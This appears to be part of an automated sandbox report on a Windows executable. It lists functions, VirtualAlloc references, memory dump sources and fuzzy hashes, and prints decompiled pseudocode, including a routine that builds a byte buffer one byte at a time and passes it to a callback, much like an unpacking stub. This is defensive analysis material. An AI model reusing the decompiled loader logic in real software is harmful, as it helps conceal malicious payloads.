Function 004031EC, Relevance: 1.5, APIs: 1, Instructions: 235memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 38dba97306054d0db44b06631b9950b65de09867d052da4b6ac1722c8b4f00dc
Instruction ID: 0c11ef5adeaabb4070bd581164c691628d8cc70f886bfd6035eca3eb778770db
Opcode Fuzzy Hash: 38dba97306054d0db44b06631b9950b65de09867d052da4b6ac1722c8b4f00dc
Instruction Fuzzy Hash: 47319A81A2EA44DAC2032E3085456725E48EAD3303331DBBF9863760E1763E4F8774DA

Uniqueness

Uniqueness Score: -1.00%

Function 00402FB6, Relevance: 1.5, APIs: 1, Instructions: 232memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 881608c9dfefc4cea8401cde7a8eba468549d2c593f1d5aea912425c0cd68918
Instruction ID: 45704eb7e7a076decf9360c2e4ec79b6c3968a83e1d81ac645648f91fa96f952
Opcode Fuzzy Hash: 881608c9dfefc4cea8401cde7a8eba468549d2c593f1d5aea912425c0cd68918
Instruction Fuzzy Hash: 4F41CC91A2E744CAD2132E3085406716E4CEB97303731DBBF99977A0E1A67E4F8734DA

Uniqueness

Uniqueness Score: -1.00%

Function 00403148, Relevance: 1.5, APIs: 1, Instructions: 231memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c1577fbe059764ecee68df6b2aae4422a254cda6b32db4282e51f11648c9ee95
Instruction ID: f463a57ef0a9158304d784730f353e0de16f2aaccdb991b68a5535dab22960ce
Opcode Fuzzy Hash: c1577fbe059764ecee68df6b2aae4422a254cda6b32db4282e51f11648c9ee95
Instruction Fuzzy Hash: FD41AB91A2EB44CAC2032E3185446719E48EBD3303331DBBF9863754E1637E4F87349A

Uniqueness

Uniqueness Score: -1.00%

Function 00403342, Relevance: 1.5, APIs: 1, Instructions: 229memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 66dbb26ffefbab655af0721ce03eb285b788c6604409dc6fcaa5c65da49f8f35
Instruction ID: 241ba9e08e9d8d27dea49c7f2b909edca83a8387de030b891b9b95813e0e5483
Opcode Fuzzy Hash: 66dbb26ffefbab655af0721ce03eb285b788c6604409dc6fcaa5c65da49f8f35
Instruction Fuzzy Hash: C151566993968089C1062F6584C1A234D0CE792F032E5EEFF5E93770D36E3D9B42608F

Uniqueness

Uniqueness Score: -1.00%

Function 00402F14, Relevance: 1.5, APIs: 1, Instructions: 228
memoryCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00402F14(void* __eax, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				void* _t60;
				signed int _t131;
				void* _t149;
				void* _t171;
				void* _t185;
				void* _t201;
				void* _t202;
				signed int _t241;
				void* _t257;

				_t257 = __fp0;
				_t185 = __esi;
				_t171 = __edi;
				_t149 = __edx;
				_t60 = _t201;
				_t202 = __eax;
				ss = es;
				_t131 = __ecx + 0x00000001 ^ 0x00000676;
				_t241 = _t131;
				asm("int1");
				if (_t241 <= 0) goto L14;
				_push(es);
			}

0x00402f14
0x00402f14
0x00402f14
0x00402f14
0x00402f15
0x00402f15
0x00402f16
0x00402f54
0x00402f54
0x00402f55
0x00402f56
0x00402f57

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ec98af1d8b9e92842699e6f751d3a58546a2de96986202895c00b05cf9102724
Instruction ID: 1d6873483d5d8b68fd3b8c11765e4cc0088ed36d4307efcf0cb819ea9e25ba46
Opcode Fuzzy Hash: ec98af1d8b9e92842699e6f751d3a58546a2de96986202895c00b05cf9102724
Instruction Fuzzy Hash: 3F41DF91A2E744CAD2132E2085446715D0CEB97303731DBBF59977A0E2627E0F8730DA

Uniqueness

Uniqueness Score: -1.00%

Function 00403295, Relevance: 1.5, APIs: 1, Instructions: 218memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d010af498fa47cccfb80951cb1f4c788dc3fb4b51cd6e9609527a1ce3f8c18c8
Instruction ID: 000e5fb03422eeee89273e78a8b3f8882673fe82dd7da4c26645cf9fb598bb10
Opcode Fuzzy Hash: d010af498fa47cccfb80951cb1f4c788dc3fb4b51cd6e9609527a1ce3f8c18c8
Instruction Fuzzy Hash: 3731AD81A1DA44DAC2132E3085442715E4CEAD3313331DBBF9863765F2A27E4F8734DA

Uniqueness

Uniqueness Score: -1.00%

Function 004032E9, Relevance: 1.5, APIs: 1, Instructions: 215memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: bc281a8de8813c7cfa573632f8ff901d370479c7aff15a496056d900b4483ccd
Instruction ID: abac92f520d9e3214b532b97d393b26adcb6480f32704f67fde54cfcdd1c296e
Opcode Fuzzy Hash: bc281a8de8813c7cfa573632f8ff901d370479c7aff15a496056d900b4483ccd
Instruction Fuzzy Hash: 7831BC81A19A00CAC3132E30C4442715E48EAD3313331DBBF9463B65E2B23E4F8734DA

Uniqueness

Uniqueness Score: -1.00%

Function 00402F9D, Relevance: 1.5, APIs: 1, Instructions: 207memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 171c9a4f31d29446a3b227073c318cb8305b6f9a7a1af536851a24fc2ef30313
Instruction ID: de760205b4aeb37ac606724333ca4c8dea19505aaaaadb5e7c3f37d17ba7b648
Opcode Fuzzy Hash: 171c9a4f31d29446a3b227073c318cb8305b6f9a7a1af536851a24fc2ef30313
Instruction Fuzzy Hash: FA41DE91A2E744CAD2032E2085446715E4CEB97303731DBBF59A7760E1667E4F8734DA

Uniqueness

Uniqueness Score: -1.00%

Function 00403247, Relevance: 1.4, APIs: 1, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b89dd7017674b082ee9d3498c921b38a2acd5f686cc26e5ab7e213d7ca9c4b29
Instruction ID: 09d77fb21e14fbb9a32f4caa08ead98fef2dd6fde3703dab632c061b616f083e
Opcode Fuzzy Hash: b89dd7017674b082ee9d3498c921b38a2acd5f686cc26e5ab7e213d7ca9c4b29
Instruction Fuzzy Hash: C2318A81A1DA40CAD3132E3185842725E48EAD3313372DBBF9863765F2667E4F8774DA

Uniqueness

Uniqueness Score: -1.00%

Function 004030EE, Relevance: 1.4, APIs: 1, Instructions: 182memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 77d1adae5e6bc94c1ddb844ef1f0e063cf7036eabbc3b286ea98a631d5158176
Instruction ID: 85cceb19c58f122c9f778fe60c65a1ed9c89e55d48cae01457edcc0099b0befd
Opcode Fuzzy Hash: 77d1adae5e6bc94c1ddb844ef1f0e063cf7036eabbc3b286ea98a631d5158176
Instruction Fuzzy Hash: C841B991A2EB44CAD2032E2085406719E48EBD3303731DBBF99A3754E1627E4F87349A

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 020E50DA, Relevance: 1.5, Strings: 1, Instructions: 230COMMON

Download Yara Rule

Strings

&<2, xrefs: 020E5123

Memory Dump Source

Source File: 00000000.00000002.734590568.00000000020E0000.00000040.00000001.sdmp, Offset: 020E0000, based on PE: false

Similarity

API ID:
String ID: &<2
API String ID: 0-720881918
Opcode ID: fabab3670416cc5543ac6633ee3155bdc8a8d153db2b97ad9cd78720e701ce4c
Instruction ID: d3999d06877a6b19ef53434a2554e0a7bc0c07b7def01c5489a7fdfc141a54f6
Opcode Fuzzy Hash: fabab3670416cc5543ac6633ee3155bdc8a8d153db2b97ad9cd78720e701ce4c
Instruction Fuzzy Hash: 6C81B464A043428FDF26CF3888D4B59BFE19F52328F98C699D5978B2D6D37484C2D722

Uniqueness

Uniqueness Score: -1.00%

Function 020E50DF, Relevance: 1.4, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

&<2, xrefs: 020E5123

Memory Dump Source

Source File: 00000000.00000002.734590568.00000000020E0000.00000040.00000001.sdmp, Offset: 020E0000, based on PE: false

Similarity

API ID:
String ID: &<2
API String ID: 0-720881918
Opcode ID: 201ed1fd6e0b428dda0624f3b2739a882ce5637476759b4c2ba4ecf13067b664
Instruction ID: a57504d5ea0332d76a102a407c2ae647c77b961d8308d5fd6f264b03bf731cf6
Opcode Fuzzy Hash: 201ed1fd6e0b428dda0624f3b2739a882ce5637476759b4c2ba4ecf13067b664
Instruction Fuzzy Hash: D65185749043418FCF65CF388894759BFE1AB56324F48D69ED8A68F396D3358082DB26

Uniqueness

Uniqueness Score: -1.00%

Function 020E13C1, Relevance: .3, Instructions: 317COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.734590568.00000000020E0000.00000040.00000001.sdmp, Offset: 020E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53e4d66fa63afe620777745ca23a91e4a2d7e11ce7bd1e8f8889406e0e344198
Instruction ID: b0bb907ec5693452aff2c83a6a72b95175fcb219da655df7d2e9381874ffca66
Opcode Fuzzy Hash: 53e4d66fa63afe620777745ca23a91e4a2d7e11ce7bd1e8f8889406e0e344198
Instruction Fuzzy Hash: ABB17C71740702AFDB599F28CD80BE9F3A5FF09354F154229E8AA93640CB74AC95DB90

Uniqueness

Uniqueness Score: -1.00%

Function 020E2030, Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.734590568.00000000020E0000.00000040.00000001.sdmp, Offset: 020E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02b6fb0369afa26a42bb23a71749cdcfc6ca7eefe34e9142f3b4e7664524b158
Instruction ID: 4f690a8931875163721690f93ea65566f6986335cfb0d39912b34cc385af53c1
Opcode Fuzzy Hash: 02b6fb0369afa26a42bb23a71749cdcfc6ca7eefe34e9142f3b4e7664524b158
Instruction Fuzzy Hash: 9E51F871540348AFEF755E20CC81BE97B6AFF19354F001228FE569A1A0CBB595C4BF44

Uniqueness

Uniqueness Score: -1.00%

Function 0040161E, Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58187ee0e133b0b48bb3efed7ac890b15464e5e05c24970065dea5c804966976
Instruction ID: d394a65342a6a254380257ba0734a19f866dc21ad068f5b1ddaac111a7468d93
Opcode Fuzzy Hash: 58187ee0e133b0b48bb3efed7ac890b15464e5e05c24970065dea5c804966976
Instruction Fuzzy Hash: F641279025E2D4EFC71B47B64CBA2813FE1AE07108B1A88EFD6D54B8A3E555241FC727

Uniqueness

Uniqueness Score: -1.00%

Function 020E1827, Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.734590568.00000000020E0000.00000040.00000001.sdmp, Offset: 020E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f83557e1a6f45100e8fa670d72757d2fe78bf5c4eb2416a92cd5b2054e43bce
Instruction ID: c22c2f29f73b4c4b20fc95bbd558a78dca567fbba03c5aa166de8942159c06ba
Opcode Fuzzy Hash: 3f83557e1a6f45100e8fa670d72757d2fe78bf5c4eb2416a92cd5b2054e43bce
Instruction Fuzzy Hash: 7631F075A043059FDF658E28CD40BE4B3E9FF15350F140229E86AA7641CB30AC86AF44

Uniqueness

Uniqueness Score: -1.00%

Function 020E1A0A, Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.734590568.00000000020E0000.00000040.00000001.sdmp, Offset: 020E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a72cab8789e295fa10f7aab75d6bac1dd8e709102728609f5460c840a770aebf
Instruction ID: 68fab65bb05d03f256c03191d0f7954ef5295dda4e462a20c45d19799b16c055
Opcode Fuzzy Hash: a72cab8789e295fa10f7aab75d6bac1dd8e709102728609f5460c840a770aebf
Instruction Fuzzy Hash: E031A970244340EFEB26AF24CD48BE8B7AABF15364F254254ED475B1E2C7B09CC0EA25

Uniqueness

Uniqueness Score: -1.00%

Function 0040185A, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e24cef5b52d058c6559a4647f5f96652dbae51e6763f7f5d8b23a4fe3d590a8
Instruction ID: 0ef76ab4ed2bcdf07a831812e9108315abc5032b0251afc9fc56c28be75d868b
Opcode Fuzzy Hash: 9e24cef5b52d058c6559a4647f5f96652dbae51e6763f7f5d8b23a4fe3d590a8
Instruction Fuzzy Hash: 5E11DAB150E3E59FCB174B748CB52527FB0AF1B20070A44EBD4819F8A7E268281ED727

Uniqueness

Uniqueness Score: -1.00%

Function 020E5491, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.734590568.00000000020E0000.00000040.00000001.sdmp, Offset: 020E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b44f77ec8aac03476842d1bef1ba8d294f278bf0fc054f8f27f8b4a1221384a9
Instruction ID: d384e5a69cc758d7ea1c90df01fe1933bdc3eee32cd103b83abcfcb227f3d970
Opcode Fuzzy Hash: b44f77ec8aac03476842d1bef1ba8d294f278bf0fc054f8f27f8b4a1221384a9
Instruction Fuzzy Hash: A901A5B5D043484EEF654E198990394FFA4EF42268F84772DD8736F28BCB20D2435B19

Uniqueness

Uniqueness Score: -1.00%

Function 0040180D, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 072463a7c437865975a3864d9424ff10385e28a77ccb1411e9edc6cac81fba01
Instruction ID: 3a4f40afd7daac755765d0dbc513794409bb1d663c47dbf88c845af7c1cdfe86
Opcode Fuzzy Hash: 072463a7c437865975a3864d9424ff10385e28a77ccb1411e9edc6cac81fba01
Instruction Fuzzy Hash: CBF07A70124154EFCB06CF74D8A5A063BE1AF5B3407451CDAD9108F475D736B865EB12

Uniqueness

Uniqueness Score: -1.00%

Function 020E4A9E, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.734590568.00000000020E0000.00000040.00000001.sdmp, Offset: 020E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a37c2898730e2a6fd495b980d0f39f1ec7de068f62bf217e2b4471702b74be2
Instruction ID: fee45c7f9fc6d11c364c8aab9b12f4fd3ad299a53e132bdd9bda4d7d6f038617
Opcode Fuzzy Hash: 6a37c2898730e2a6fd495b980d0f39f1ec7de068f62bf217e2b4471702b74be2
Instruction Fuzzy Hash: C6E0EE783023008FCB66DA18C5D4E1AB3B1AB58720B1684A9E4028B722C334E880EA29

Uniqueness

Uniqueness Score: -1.00%

Function 020E25EE, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.734590568.00000000020E0000.00000040.00000001.sdmp, Offset: 020E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction ID: a026a310f9d08bb1d858143eb29fddbf5fc3d9bc52f9beb0b7c2352c6f2dcf67
Opcode Fuzzy Hash: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction Fuzzy Hash: CDB002B66515819FEF56DB08D591B4073A4FB55648B0904D0E412DB712D224E910CA04

Uniqueness

Uniqueness Score: -1.00%

Function 020E4358, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.734590568.00000000020E0000.00000040.00000001.sdmp, Offset: 020E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10

Uniqueness

Uniqueness Score: -1.00%

Function 0040DCB2, Relevance: 97.9, APIs: 65, Instructions: 390
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040DCB2(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8, void* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v40;
				void* _v44;
				intOrPtr _v56;
				char _v68;
				char _v76;
				signed int _v80;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				char _t226;
				char* _t228;
				void* _t325;
				void* _t327;
				intOrPtr _t328;

				_t328 = _t327 - 0xc;
				 *[fs:0x0] = _t328;
				L004012A0();
				_v16 = _t328;
				_v12 = 0x4011d8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012a6, _t325);
				L00401420();
				L004013E4();
				_push(0x11);
				_push(0x40b1fc);
				_t226 =  &_v68;
				_push(_t226);
				L004013A2();
				_v80 = _v80 & 0x00000000;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v92 = _t226;
				} else {
					_v92 = _v92 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 1;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v96 = _t226;
				} else {
					_v96 = _v96 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 2;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v100 = _t226;
				} else {
					_v100 = _v100 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 3;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v104 = _t226;
				} else {
					_v104 = _v104 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 4;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v108 = _t226;
				} else {
					_v108 = _v108 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 5;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v112 = _t226;
				} else {
					_v112 = _v112 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 6;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v116 = _t226;
				} else {
					_v116 = _v116 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 7;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v120 = _t226;
				} else {
					_v120 = _v120 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 8;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v124 = _t226;
				} else {
					_v124 = _v124 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 9;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v128 = _t226;
				} else {
					_v128 = _v128 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0xa;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v132 = _t226;
				} else {
					_v132 = _v132 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0xb;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v136 = _t226;
				} else {
					_v136 = _v136 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0xc;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v140 = _t226;
				} else {
					_v140 = _v140 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0xd;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v144 = _t226;
				} else {
					_v144 = _v144 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0xe;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v148 = _t226;
				} else {
					_v148 = _v148 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0xf;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v152 = _t226;
				} else {
					_v152 = _v152 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0x10;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v156 = _t226;
				} else {
					_v156 = _v156 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0x11;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v160 = _t226;
				} else {
					_v160 = _v160 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0x12;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v164 = _t226;
				} else {
					_v164 = _v164 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0x13;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v168 = _t226;
				} else {
					_v168 = _v168 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0x14;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v172 = _t226;
				} else {
					_v172 = _v172 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0x15;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v176 = _t226;
				} else {
					_v176 = _v176 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0x16;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v180 = _t226;
				} else {
					_v180 = _v180 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0x17;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v184 = _t226;
				} else {
					_v184 = _v184 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0x18;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v188 = _t226;
				} else {
					_v188 = _v188 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0x19;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v192 = _t226;
				} else {
					_v192 = _v192 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0x1a;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v196 = _t226;
				} else {
					_v196 = _v196 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0x1b;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v200 = _t226;
				} else {
					_v200 = _v200 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0x1c;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v204 = _t226;
				} else {
					_v204 = _v204 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_push(E0040E2A6);
				L00401450();
				L00401462();
				_v76 =  &_v68;
				_t228 =  &_v76;
				_push(_t228);
				_push(0);
				L00401390();
				return _t228;
			}

0x0040dcb5
0x0040dcc4
0x0040dcd0
0x0040dcd8
0x0040dcdb
0x0040dce2
0x0040dcf1
0x0040dcfa
0x0040dd05
0x0040dd0a
0x0040dd0c
0x0040dd11
0x0040dd14
0x0040dd15
